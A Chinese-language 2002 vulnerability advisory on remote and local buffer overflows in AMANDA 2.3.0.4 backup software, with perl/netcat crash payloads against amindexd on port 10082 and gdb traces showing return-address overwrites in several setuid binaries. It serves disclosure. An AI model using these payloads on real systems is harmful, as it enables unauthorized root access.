AMANDA存在缓冲溢出攻击漏洞发布时间:2002-05-29 更新时间:2002-05-29 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 受影响系统 AMANDA 2.3.0.4详细描述 Advanced Maryland Automatic Network Disk Archiver (AMANDA)是使用于多种Unix系统的备份程序,多个两进制程序以setuid和setgid方式安装,其中存在多个缓冲溢出,可导致权限提升。 本地缓冲溢出只能被那些操作组的成员运行,比较严重的问题是amindexd守护程序(10082/TCP)以ROOT权限运行,并可触发溢出,超长的命令发送给服务器,可导致程序崩溃,造成以ROOT权限执行任意命令。 测试代码 perl -e 'print "A" x 260;print "BBBB";' | nc localhost 10082 perl -e 'print "DATE "; print "A" x 260;' | nc localhost 10082 amcheck file (setuid root) ------------------------------------------- bash-2.05a# /usr/local/bin/amcheck `perl -e 'print "A" x 1000'` Segmentation fault (core dumped) (gdb) bt #0 0x2814c022 in ?? () #1 0x280f8c0a in ?? () #2 0x804d671 in ?? () #3 0x41414141 in ?? () Cannot access memory at address 0x41414141. (gdb) The amgetidx file (setuid operator) ------------------------------------------- (gdb) bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx (gdb) r `perl -e 'print "A" x 3000'` Starting program: /usr/local/libexec/amanda/amgetidx `perl -e 'print "A" x 3000'` (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x28144022 in vfprintf () from /usr/lib/libc.so.4 (gdb) bt #0 0x28144022 in vfprintf () from /usr/lib/libc.so.4 #1 0x280f0c0a in vsprintf () from /usr/lib/libc.so.4 #2 0x804c8dd in getsockname () #3 0x41414141 in ?? () Error accessing memory address 0x41414141: Bad address. (gdb) The amtrmidx file (setuid operator) ------------------------------------------- bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx (gdb) r `perl -e 'print "A" x 3000'` Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e 'print "A" x 3000'` (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x28141022 in vfprintf () from /usr/lib/libc.so.4 (gdb) bt #0 0x28141022 in vfprintf () from /usr/lib/libc.so.4 #1 0x280edc0a in vsprintf () from /usr/lib/libc.so.4 #2 0x804b291 in free () #3 0x41414141 in ?? () Error accessing memory address 0x41414141: Bad address. (gdb) The createindex-dump file (setuid operator) ------------------------------------------- sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump (gdb) r `perl -e 'print "A" x 4000'` a a a Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e 'print "A" x 4000'` a a a (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814398c in getenv () from /usr/lib/libc.so.4 (gdb) bt #0 0x2814398c in getenv () from /usr/lib/libc.so.4 #1 0x28142801 in isatty () from /usr/lib/libc.so.4 #2 0x2814362e in malloc () from /usr/lib/libc.so.4 #3 0x280fbec2 in popen () from /usr/lib/libc.so.4 #4 0x8048874 in atoi () #5 0x41414141 in ?? () Error accessing memory address 0x41414141: Bad address. (gdb) The createindex-gnutar file (setuid operator) ---------------------------------------------- bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar (gdb) r `perl -e 'print "A" x 4000'` a a a Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e 'print "A" x 4000'` a a a (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814398c in getenv () from /usr/lib/libc.so.4 (gdb) bt #0 0x2814398c in getenv () from /usr/lib/libc.so.4 #1 0x28142801 in isatty () from /usr/lib/libc.so.4 #2 0x2814362e in malloc () from /usr/lib/libc.so.4 #3 0x280fbec2 in popen () from /usr/lib/libc.so.4 #4 0x8048811 in atoi () #5 0x41414141 in ?? () Error accessing memory address 0x41414141: Bad address. (gdb) 解决方案 尚无 相关信息 zillion (zillion@snosoft.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-05/0227.html |
